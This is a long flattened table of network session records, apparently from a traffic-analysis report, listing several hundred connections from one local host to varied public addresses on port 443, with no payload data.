                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19631192.168.2.1448390110.134.79.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19632192.168.2.145228098.2.133.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19633192.168.2.1450128201.82.229.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19634192.168.2.1446356101.81.193.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19635192.168.2.1460888162.172.74.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19636192.168.2.1456908131.84.101.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19637192.168.2.1433176166.193.108.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19638192.168.2.144199413.94.233.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19639192.168.2.1436226217.70.28.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19640192.168.2.1441004173.214.31.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19641192.168.2.143342414.146.217.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19642192.168.2.143647484.100.20.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19643192.168.2.1443942168.61.4.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19644192.168.2.1440440203.31.0.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19645192.168.2.143985843.79.90.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19646192.168.2.1443548149.252.245.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19647192.168.2.1445972110.159.10.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19648192.168.2.1435424156.201.255.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19649192.168.2.1452756110.133.43.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19650192.168.2.1449888210.24.57.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19651192.168.2.1455156168.0.145.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19652192.168.2.1454622129.77.126.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19653192.168.2.1440496190.196.205.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19654192.168.2.145224623.120.116.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19655192.168.2.144197884.200.40.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19656192.168.2.144099838.143.181.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19657192.168.2.143393812.124.30.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19658192.168.2.143772417.193.187.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19659192.168.2.1436880126.202.92.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19660192.168.2.1444568191.139.69.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19661192.168.2.1440028208.129.1.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19662192.168.2.145955051.224.132.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19663192.168.2.1436718182.188.88.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19664192.168.2.143927439.167.230.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19665192.168.2.1443188194.221.203.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19666192.168.2.1446256169.219.96.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19667192.168.2.1452762175.131.92.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19668192.168.2.1443412205.245.239.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19669192.168.2.1444938168.84.24.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19670192.168.2.145511648.238.224.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19671192.168.2.145601247.225.174.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19672192.168.2.145806491.59.90.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19673192.168.2.1443746140.245.111.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19674192.168.2.143448420.63.82.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19675192.168.2.145601818.27.200.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19676192.168.2.1457464130.5.23.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19677192.168.2.1453670192.194.46.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19678192.168.2.1447150141.107.76.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19679192.168.2.145339682.90.93.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19680192.168.2.1460786196.198.2.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19681192.168.2.145478858.221.33.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19682192.168.2.1445280170.108.57.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19683192.168.2.1432866207.118.142.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19684192.168.2.1434716147.145.16.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19685192.168.2.1435922134.37.64.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19686192.168.2.145171283.79.51.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19687192.168.2.145873851.38.2.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19688192.168.2.1445726193.104.143.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19689192.168.2.1438316103.89.27.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19690192.168.2.1445446150.111.89.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19691192.168.2.1443982102.28.2.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19692192.168.2.1458276119.0.233.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19693192.168.2.1454112189.149.43.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19694192.168.2.1457940116.141.169.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19695192.168.2.1437290197.196.202.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19696192.168.2.1460104204.115.154.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19697192.168.2.1454772139.130.186.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19698192.168.2.1443596190.27.181.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19699192.168.2.145082040.229.80.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19700192.168.2.1446132197.237.20.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19701192.168.2.1439654104.29.58.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19702192.168.2.144969420.152.161.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19703192.168.2.144684045.74.120.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19704192.168.2.1434754108.139.208.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19705192.168.2.1443528151.233.131.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19706192.168.2.1448730200.108.40.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19707192.168.2.1447606148.19.75.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19708192.168.2.144441478.11.60.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19709192.168.2.1435086204.31.127.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19710192.168.2.144668279.32.26.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19711192.168.2.1433524121.237.88.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19712192.168.2.1459588201.250.23.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19713192.168.2.144014898.17.146.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19714192.168.2.1447350133.228.237.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19715192.168.2.1449058206.6.119.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19716192.168.2.1441306104.161.57.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19717192.168.2.1434030201.80.120.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19718192.168.2.1459094108.178.253.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19719192.168.2.1447812121.204.231.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19720192.168.2.1459754194.105.213.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19721192.168.2.1445212140.138.208.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19722192.168.2.143593885.116.88.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19723192.168.2.1451124132.107.97.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19724192.168.2.144320869.159.230.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19725192.168.2.1456502137.243.177.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19726192.168.2.143843032.138.212.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19727192.168.2.1457526109.198.84.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19728192.168.2.144017682.199.201.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19729192.168.2.143696072.53.225.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19730192.168.2.144198082.209.233.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19731192.168.2.1445642151.70.69.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19732192.168.2.14377862.149.55.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19733192.168.2.145049032.121.98.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19734192.168.2.1440046137.44.164.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19735192.168.2.1455162146.77.156.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19736192.168.2.14551229.143.163.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19737192.168.2.1447448117.119.127.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19738192.168.2.1433418203.89.142.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19739192.168.2.144377650.255.90.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19740192.168.2.1452886200.146.6.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19741192.168.2.144717442.127.160.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19742192.168.2.1457700212.34.133.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19743192.168.2.1443552208.161.147.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19744192.168.2.1434034153.169.208.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19745192.168.2.145453639.56.72.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19746192.168.2.144023018.242.168.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19747192.168.2.145500027.160.241.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19748192.168.2.1454494114.55.191.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19749192.168.2.144413459.10.227.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19750192.168.2.143290089.186.11.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19751192.168.2.1459124193.137.8.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19752192.168.2.1454464146.146.85.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19753192.168.2.145384231.234.216.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19754192.168.2.144573091.26.51.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19755192.168.2.143682243.134.6.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19756192.168.2.143998825.215.101.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19757192.168.2.143349620.205.161.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19758192.168.2.1458596137.225.27.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19759192.168.2.1456294187.145.56.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19760192.168.2.1450260192.165.237.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19761192.168.2.1457006132.61.146.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19762192.168.2.144074670.253.211.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19763192.168.2.144934618.181.86.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19764192.168.2.1436658168.213.93.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19765192.168.2.1458978189.62.225.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19766192.168.2.1449474213.97.33.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19767192.168.2.1453514200.61.133.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19768192.168.2.145533676.91.201.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19769192.168.2.144047012.192.152.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19770192.168.2.1450300159.205.222.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19771192.168.2.145550654.61.67.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19772192.168.2.1443518211.249.133.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19773192.168.2.14330729.5.251.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19774192.168.2.144158640.80.106.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19775192.168.2.1458074175.147.35.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19776192.168.2.1458366134.212.182.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19777192.168.2.1448468109.236.161.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19778192.168.2.1445916115.234.218.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19779192.168.2.1448430167.249.148.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19780192.168.2.143429053.151.11.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19781192.168.2.143623689.158.33.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19782192.168.2.1433894104.212.213.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19783192.168.2.1441734205.237.46.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19784192.168.2.145907863.98.63.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19785192.168.2.1435382199.75.136.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19786192.168.2.143283244.144.142.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19787192.168.2.143792883.173.12.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19788192.168.2.1456800220.130.119.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19789192.168.2.145501631.225.91.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19790192.168.2.145875691.67.220.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19791192.168.2.1445150135.77.230.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19792192.168.2.1434984106.151.43.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19793192.168.2.143338087.74.210.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19794192.168.2.144282886.72.230.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19795192.168.2.144794877.162.189.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19796192.168.2.145595263.10.104.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19797192.168.2.1440666147.72.185.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19798192.168.2.143532464.81.73.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19799192.168.2.1450248154.86.101.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19800192.168.2.1459116139.150.244.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19801192.168.2.145529689.227.8.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19802192.168.2.1450786217.255.190.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19803192.168.2.1446940146.5.78.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19804192.168.2.1460418151.81.76.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19805192.168.2.1460664203.162.107.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19806192.168.2.1457762222.174.253.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19807192.168.2.1451744115.21.240.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19808192.168.2.1449578152.92.253.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19809192.168.2.1452320197.181.2.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19810192.168.2.1444408164.24.26.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19811192.168.2.144050817.42.231.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19812192.168.2.144498218.62.146.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19813192.168.2.143395267.68.175.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19814192.168.2.1446754218.174.213.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19815192.168.2.1450208206.15.215.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19816192.168.2.143803819.64.93.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19817192.168.2.143834014.166.203.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19818192.168.2.1454214179.118.179.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19819192.168.2.145431835.145.212.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19820192.168.2.1435356102.220.138.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19821192.168.2.1440910211.230.165.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19822192.168.2.144501669.135.225.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19823192.168.2.1435368216.131.54.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19824192.168.2.1441988140.161.70.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19825192.168.2.1447890190.186.137.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19826192.168.2.1437420174.51.229.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19827192.168.2.144079023.220.120.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19828192.168.2.14331044.177.26.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19829192.168.2.143334824.16.36.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19830192.168.2.14499084.114.82.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19831192.168.2.145341234.94.120.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19832192.168.2.1442984218.193.25.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19833192.168.2.1439964158.47.46.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19834192.168.2.145259466.150.60.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19835192.168.2.1445522200.207.67.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19836192.168.2.1447452148.87.231.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19837192.168.2.145541882.10.156.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19838192.168.2.1460602179.102.189.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19839192.168.2.143489253.119.82.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19840192.168.2.1439300102.197.31.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19841192.168.2.143380060.69.194.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19842192.168.2.145829846.136.95.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19843192.168.2.1446690210.156.58.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19844192.168.2.1460088155.188.16.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19845192.168.2.1438652148.250.203.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19846192.168.2.1455106171.194.4.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19847192.168.2.1440768104.115.38.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19848192.168.2.1456846124.246.105.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19849192.168.2.145672234.145.147.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19850192.168.2.143701042.1.125.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19851192.168.2.145216892.13.87.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
